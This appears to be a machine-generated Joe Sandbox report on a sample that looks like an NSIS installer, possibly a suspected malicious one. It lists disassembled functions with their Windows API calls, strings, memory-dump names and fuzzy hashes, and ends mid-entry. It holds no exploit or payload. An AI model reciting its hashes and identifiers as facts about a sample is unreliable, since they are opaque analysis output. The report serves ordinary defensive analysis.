Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32 ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004,?,00000000,00000000,?,?,?,?,?,000000F0,?,000000F0), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Sleep(%d), xrefs: 0040169D
CreateDirectory: "%s" created, xrefs: 00401849
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename on reboot: %s, xrefs: 00401943
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Aborting: "%s", xrefs: 0040161D
Jump: %d, xrefs: 00401602
BringToFront, xrefs: 004016BD
Rename failed: %s, xrefs: 0040194B
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" (%d), xrefs: 004017BF
Call: %d, xrefs: 0040165A
Rename: %s, xrefs: 004018F8
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32 ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32 ref: 00405619
GetDlgItem.USER32 ref: 00405623
SetClassLongW.USER32(?,000000F2,?,0000001C,000000FF), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32 ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32 ref: 00405B4E
CreateWindowExW.USER32 ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32 ref: 00405BE9
GetClassInfoW.USER32 ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32 ref: 00405C1E

Strings

.DEFAULT\Control Panel\International, xrefs: 004059C5
.exe, xrefs: 00405A69
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEd32, xrefs: 00405BD4
"F, xrefs: 00405A4B
RichEdit, xrefs: 00405BF0
_Nb, xrefs: 00405AFD
F, xrefs: 00405A22
@jG, xrefs: 00405AF2
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd20, xrefs: 00405BC9

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,%TechnoBecome%,%TechnoBecome%,00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
%TechnoBecome%, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: %TechnoBecome%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2879760291
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00427176,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

... %d%%, xrefs: 004034C8
vqB, xrefs: 0040346F, 0040348A, 00403513
pAB, xrefs: 004033AB
(]C, xrefs: 004033FD
y1B, xrefs: 00403458, 0040346A

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$vqB$y1B
API String ID: 651206458-2710265387
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
soft, xrefs: 004036A1
Null, xrefs: 004036AA
Error launching installer, xrefs: 00403603

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00427176,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

%TechnoBecome%, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: %TechnoBecome%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3880727211
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

